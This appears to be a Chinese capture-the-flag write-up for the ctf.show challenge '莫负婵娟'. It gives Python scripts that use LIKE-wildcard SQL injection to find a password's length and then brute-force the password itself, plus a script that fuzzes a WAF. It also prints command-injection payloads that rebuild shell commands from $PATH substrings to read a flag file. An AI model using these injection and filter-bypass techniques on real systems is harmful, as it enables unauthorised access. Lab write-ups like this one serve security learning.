莫负婵娟

经测试发现 % 被WAF，但是 _ 还可以使用，利用 _ 爆破密码长度(_匹配单个字符)。

import requests

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

for i in range(50):
    exp = '_' * i
    payload = {'username': 'yu22x',
               'password': exp}
    headers = {
        'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
    }
    response = requests.request("POST", url, headers=headers, data=payload, files=[])
    if response.text.find('wrong username or password') == -1:
        print(i)
        print(response.text.encode('utf-8'))

返回结果：

32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'

说明密码长度有32位长。写个脚本爆破密码：

import requests
import string

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

password = ''
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}
files = []

for i in range(32):
    for j in string.digits + string.ascii_letters:
        exp = '_' * (32 - i - 1)
        payload = {'username': 'yu22x',
                   'password': password + j + exp
                   }
        response = requests.request("POST", url=url, headers=headers, data=payload, files=[])
        if response.text.find('wrong username or password') == -1:
            password += j
            break

print(password)

爆出来的密码：

67815b0c009ee970fe4014abaa3Fa6A0

登录之后是一个内部网测试平台，初步推测是SSRF漏洞，尝试穿越目录，发现被waf了。写个脚本，fuzz所有可见字符（注意修改Cookies）：

import string
import requests

url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"

file = open('fuzz.txt', 'w')

for i in string.printable:
    payload = {'ip': i}
    files = [

    ]
    headers = {
        'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
    }
    response = requests.request("POST", url, headers=headers, data=payload, files=files)
    if response.text.find('evil') == -1:
        file.write(i)

这个是fuzz.txt文件目录下的字符：

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~

由于Linux系统下的大小写敏感，直接使用ls不可以，尝试利用Linux系统下$PATH变量：

截取字符串：

遍历：

127.0.0.1;${PATH:5:1}${PATH:2:1}

找到有flag文件：

读取文件，用 $cat flag.php 或者 $nl flag.txt 都可以

127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???

Previous故人心 Next2020 西湖论剑

Last updated 2 years ago

import requests url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php" for i in range(50): exp = '_' * i payload = {'username': 'yu22x', 'password': exp} headers = { 'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk' } response = requests.request("POST", url, headers=headers, data=payload, files=[]) if response.text.find('wrong username or password') == -1: print(i) print(response.text.encode('utf-8'))

import requests import string url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php" password = '' headers = { 'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk' } files = [] for i in range(32): for j in string.digits + string.ascii_letters: exp = '_' * (32 - i - 1) payload = {'username': 'yu22x', 'password': password + j + exp } response = requests.request("POST", url=url, headers=headers, data=payload, files=[]) if response.text.find('wrong username or password') == -1: password += j break print(password)

import string import requests url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php" file = open('fuzz.txt', 'w') for i in string.printable: payload = {'ip': i} files = [ ] headers = { 'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2' } response = requests.request("POST", url, headers=headers, data=payload, files=files) if response.text.find('evil') == -1: file.write(i)